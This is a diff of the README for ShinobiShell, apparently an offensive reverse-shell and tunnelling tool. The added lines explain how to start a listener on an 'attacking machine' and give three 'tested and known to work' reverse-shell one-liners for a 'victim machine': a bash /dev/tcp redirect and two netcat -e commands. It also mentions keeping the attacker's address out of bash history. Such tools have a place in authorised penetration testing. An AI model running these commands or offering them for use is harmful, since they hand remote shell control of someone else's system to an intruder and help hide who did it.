DotNetRussell/ShinobiShell/README.md

 For `-c` you will be prompted at run time for the server address

 Both `-c` and `-k` were moved to runtime inputs to prevent leaking attacking machine address and key in bash history

+OPTION 2: Start a Shinobi Shell listener on your attacking machine and send it a shell

+Attacking Machine

+`./shinobishell.py -a`
+> Shinobi Tunnel Plaintext ~~ Be aware
+> Which port to listen on: 1000
+> What is the ShinobiServer address:port combination: 127.0.0.1:443

+Victim Machine

+Send a reverse shell

+(tested and known to work)

+`/bin/bash -i >& /dev/tcp/127.0.0.1/1000 0>&1`

+`nc 127.0.0.1 1000 -e /bin/bash`

+`nc 127.0.0.1 1000 -e /bin/sh`

 ```
 Shinobi Shell v1.0